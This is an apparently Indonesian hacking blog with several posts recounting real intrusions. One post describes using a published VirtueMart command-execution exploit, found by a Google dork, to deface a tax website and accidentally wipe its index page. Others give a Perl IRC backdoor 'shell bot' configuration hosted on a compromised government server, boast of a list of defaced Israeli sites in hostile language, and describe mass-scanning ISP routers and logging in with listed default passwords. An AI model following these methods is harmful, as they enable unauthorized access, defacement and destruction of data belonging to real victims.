VirtueMart Remote Shell Command Execution

April 1, 2009

Pagi-pagi berkunjung ke www.milw0rm.com wah ada bug baru ternyata baca2 bentar terus buka uncle google coba keyword inurl:components/com_virtuemart/ site indo hehehe
dan jreng-jreng banyak oge euy heheh coba satu owh berhasil euy site indo lagi pv kang isur suruh diroot tapi dia gak mau lagi gak mood kali maklum penganten baru duh jadi bingung mau conact back gak punya shell yang ada cuma shellangkangan coba liad site satu server ls -al /home2/chroot/ wow banyak site2 yang menarik untuk di hajar hahahaha

total 1080
drwxr-xr-x 268 nobody nobody 12288 Mar 6 08:39 .
drwxr-xr-x 6 sutanto sutanto 4096 Mar 16 13:28 ..
drwxr-xr-x 7 2216 2216 4096 Mar 5 17:25 2dees
drwxr-xr-x 5 2296 2296 4096 Mar 6 08:39 acul
drwxr-xr-x 7 2074 2074 4096 Jul 16 2008 adsis
drwxr-xr-x 12 2230 2230 4096 Mar 24 2008 adsjakar
drwxr-xr-x 5 2251 2251 4096 Mar 26 2008 ad-v
drwxr-xr-x 5 2289 2289 4096 Jun 20 2008 adventnusra.com
drwxr-xr-x 7 2019 2019 4096 Oct 19 2007 advertizer
drwxr-xr-x 6 2203 2203 4096 Apr 22 2008 agrotrisari
drwxr-xr-x 5 2238 2238 4096 May 9 2008 banklampung
.
.
.
…….dan seterusnya deh banyak banget hehehe

wah ada site pajak tuh coba masuk hmm enaknya di defes nih hihihi biar keren kasi imbauan pajak aja ah “ORANG BIJAK BAYAR PAJAK”
coba liat2 dulu ls -al wah wah ada 2 index index.php sama index2.php
dibackup dulu mv index.php index.lama;mv index2.php index.lama.juga; terus pake bikin file index baru pake perintah echo "orang bijak bayar pajak" > index.php liad hasil ls -al

total 14868
rwxr-xr-x 23 2145 2145 4096 Feb 16 08:44 .
drwxr-xr-x 7 2145 2145 4096 Jun 11 2008 ..
drwxrwxrwx 9 2145 2145 4096 Feb 5 2008 administrator
drwxrwxrwx 5 2145 2145 4096 Apr 1 02:00 awstats
-rw-r--r-- 1 2145 2145 24 Jan 16 2008 .bash_logout
-rw-r--r-- 1 2145 2145 191 Jan 16 2008 .bash_profile
-rw-r--r-- 1 2145 2145 124 Jan 16 2008 .bashrc
drwxrwxrwx 2 2145 2145 4096 Apr 1 07:34 cache
-rwxrwxrwx 1 2145 2145 101854 Feb 5 2008 CHANGELOG.php
drwxrwxrwx 20 2145 2145 4096 Apr 9 2008 components
-rwxrwxrwx 1 2145 2145 2985 May 14 2008 configuration.php
-rwxrwxrwx 1 2145 2145 0 Feb 21 2008 configuration.php.bak
-rw-r--r-- 1 2145 2145 21 Jan 16 2008 .contactemail
-rwxrwxrwx 1 2145 2145 3429 Feb 5 2008 COPYRIGHT.php
drwxr-xr-x 3 2145 2145 4096 Jan 18 2008 .cpaddons
drwx------ 2 2145 2145 4096 Feb 5 2008 .cpanel-datastore
-rw------- 1 2145 2145 40279 Feb 4 2008 .cpanel-ducache
drwxrwxrwx 2 2145 2145 4096 Feb 5 2008 editor
-rwxrwxrwx 1 2145 2145 5852 Feb 5 2008 error_log
drwxr-xr-x 8 2145 2145 4096 Jan 22 2008 .fantasticodata
-rwxrwxrwx 1 2145 2145 37 Feb 5 2008 fantversion.php
-rw-r--r-- 1 2145 2145 14789534 Mar 9 2008 fullbackup.tar.bz2
-rwxrwxrwx 1 2145 2145 3745 Feb 5 2008 globals.php
-rw-r--r-- 1 2145 2145 300 Feb 15 2008 google95957359700e9e3b.html
drwxrwxrwx 3 2145 2145 12288 Feb 5 2008 help
-rwxrwxrwx 1 2145 2145 4860 Mar 12 2008 .htaccess
-rwxrwxrwx 1 2145 2145 5076 Feb 5 2008 htac.txt
drwxrwxrwx 7 2145 2145 4096 Mar 3 2008 images
drwxrwxrwx 10 2145 2145 4096 Feb 16 11:01 includes
-rwxrwxrwx 1 2145 2145 5223 Feb 5 2008 index2.php
-rwxrwxrwx 1 2145 2145 158 Apr 1 07:58 index.php
-rwxrwxrwx 1 2145 2145 4376 Feb 5 2008 INSTALL.php
-rw-r--r-- 1 2145 2145 26283 Jan 25 17:54 kue.jpg
drwxrwxrwx 2 2145 2145 4096 Feb 5 2008 language
-rw------- 1 2145 2145 12 Feb 5 2008 .lastlogin
-rwxrwxrwx 1 2145 2145 17977 Feb 5 2008 LICENSE.php
-rwxrwxrwx 1 2145 2145 710 Feb 5 2008 mainbody.php
drwxrwxrwx 8 2145 2145 4096 Apr 9 2008 mambots
drwxrwxrwx 2 2145 2145 4096 Apr 9 2008 media
drwxrwxrwx 5 2145 2145 4096 Mar 12 2008 modules
-rwxrwxrwx 1 2145 2145 2474 Feb 5 2008 offlinebar.php
-rwxrwxrwx 1 2145 2145 4929 Feb 5 2008 offline.php
drwxrwxrwx 2 2145 2145 4096 Feb 6 2008 pajak
-rwxrwxrwx 1 2145 2145 709 Feb 5 2008 pathway.php
drwxr-xr-x 10 2145 2145 4096 May 29 2008 phpMyAdmin
-rwxrwxrwx 1 2145 2145 286 Feb 5 2008 robots.txt
-rw------- 1 2145 2145 24 Jan 21 2008 .spamkey
drwx------ 2 2145 2145 4096 Jan 22 2008 .sqmaildata
drwxrwxrwx 2 2145 2145 4096 Apr 1 01:18 stat
drwxrwxrwx 7 2145 2145 4096 Feb 5 2008 templates
drwx------ 2 2145 2145 4096 Feb 2 2008 .trashhmm

ternyata tidak ada yang berubah di list file nya kok bisa apa gak punya akses execute yah…
coba aku akses sitena wew blank
ternyata command echo di eksekusi tapi perintah mv gak dieksekusi waduh waduh maaf om admin index asli ke hapus punten ah udah ah takut mending off ….akibatnya…..WWW.PAJAK.COM


duh-aduh

Nyuwun pangaputen romo………………….

& Komentar | Hacking | Permalink
Ditulis oleh iwan

Shell BOT

Januari 13, 2009

judulna ga tau bener ato kagak….

sedikit tutor membuat BOT di MIRC yang berfungsi sebagai shell sehingga dari MIRC kita bisa masuk ke shell  dan melakukan perintah2 seperti di shell linux cara ini biasanya gw pake kalo gw dah ga bisa pake bind ato back connect

silahkan download source nya di http://www.sulut.depag.go.id/kliping/sh  (xixi maaf om admin numpang naro file atu ya hehehe)

edit Konfigurasinya sesuai dengan yg kamu inginkan

#!/usr/bin/perl
########## CONFIGURACAO ############
my $processo = ‘httpd’;
my $linas_max=10;
my $sleep=3;
my @adms=(“th0nk”);
my @canais=(“#yogyacarderlink”);
my $nick=’BOROKOKOK’;
my $ircname = ‘th0nk’;
chop (my $realname = `id`);
$servidor=’irc.dal.net’ unless $servidor;
my $porta=’6667′;
#ACESSO A SHELL
my $secv = 1; # 1 para t acesso a shell
####################################

kebawahnya biarkan aja gw juga kagak ngerti hehehe

jalankan dengan perintah perl sh

tunggu di chanel MIRC sesuai dengan yang kamu setting

kalo dah masuk

coba test bot nya dengan perintah !ssh command

exp:

<@th0nk> !ssh id
<th0nk[bot]> uid=48(apache) gid=48(apache) groups=48(apache)
<@th0nk> !ssh uname -a
<th0nk[bot]> Linux kanwil.depag.go.id 2.6.18-8.1.14.3.cc #1 SMP Mon Oct 22 17:57:16 EDT 2007 i686 i686 i386 GNU/Linux
<@th0nk> !ssh pwd
<th0nk[bot]> /

heheh keren kan kita bisa kendalikan tu server dari IRC

& Komentar | Hacking | Permalink
Ditulis oleh iwan

Hack Situs ISRAEL LAKNATULLAH

Januari 13, 2009

alhamdulillah bisa ngeblog lagi…
pagi2 baca infopalestina.com
hati saya bener2 ngeri ngeliat kekejaman bangsa KERA ISRAEL korban gugur sejak hari pertama mencapai 919 orang dan 4300 luka-luka…
sebagai sesama muslim tentu marah melihat pembantaian sodara2 kita di Palestina…
Hari Sabtu tgl 03 Januari Iseng2 saya bikin topic baru di forum echo.or.id
 “HACK SITUS ISRAEL” ternyata responya sangat bagus sampe hari ini udah 13 halaman dan  sudah puluhan situs israel yang tumbang oleh hacker2 indonesia… :)
bahkan ada satu web server yang hampir semua site didalmanya kena deface

wwroot


hacked

berikut ini puluhan situs israel yang berhasil di hajar hacker2 Indonesia…

http://www.stauberlaw.com
http://www.yanivzada.com
http://www.yanivedry.com
http://tintun.org.il
http://theculinaryexp.com
http://www.purehairstyling.com
http://creativegrdn.com
http://www.kadoshyaniv.com
http://www.danreisinger.com
http://www.dgeng.com
http://epi.co.il
http://herstylereu.com
http://bethlehem-gifts.com
http://bringmecomfort.com
http://www.afi-europe.eu
http://www.agrogreen.co.il
http://www.avner.org.il
http://www.baptistcave.org.il
http://www.barmaster.co.il
http://www.buzzilla.com
http://www.cal.co.il
http://www.cpl.co.il
http://creditech.co.il
http://www.danya-cebus.co.il
http://www.electra.co.il
http://www.enviro-services.co.il
http://hcourt.co.il
http://www.icetv.co.il
http://www.invest-as.com
http://www.limorlivnat.co.il
http://www.maccabi-dent.com
http://www.manta-blog.com
http://minrav.co.il
http://www.misterzol.co.il
http://www.nishaglobal.com
http://www.penthouses.co.il
http://www.portobello-hotel.gr
http://quit.co.il
http://savyonim-mall.co.il
http://www.7kook.com
http://sge.co.il
http://soad.co.il
http://www.soadbaby.co.il
http://soadfamily.co.il
http://www.space-neveoz.co.il
http://tara.co.il
http://www.tvs.co.il
http://tbwad.com
http://www.tih.co.il
http://www.anavid.co.il
http://www.vidoflex.com
http://ytong.co.il
http://zhuti.co.il

1 Komentar | Hacking | Permalink
Ditulis oleh iwan

Bobol Router ADSL Speedy

Desember 14, 2008

Ide ini berawal ketika koneksi Speedy gw ngadat…habis Complain sama pihak speedy..Iseng-iseng gw scanning massal  range ip speedy …pake angry ip scanner hasilnya…

scan

wow banyak juga yang idup coba2 login pake password default
user password
——————-
admin password
admin admin
admin <blank>
admin 1234

Hasilnya seperti ini…

Korban pertamax

korban1

Korban ke-2

korban21

Korban ke-3

korban32

Korban ke-4  ke-5 …dst..Masi banyak..dari 10 Ip yang gw coba 4 diantaranya masi pake password default …

so bagi anda yang sampe saat ini masi pake password default segera ganti…atau orang lain yang akan mengganti
………………………………………………………………………………………..

Artikel ini ditulis dengan tujuan untuk berbagi informasi dan pengetahuan dan penulis tidak bertanggung jawab atas segala resiko apapun yang terjadi akibat dari penyalahgunaan artikel ini.

& Komentar | Hacking | Permalink
Ditulis oleh iwan

« Entri Sebelumnya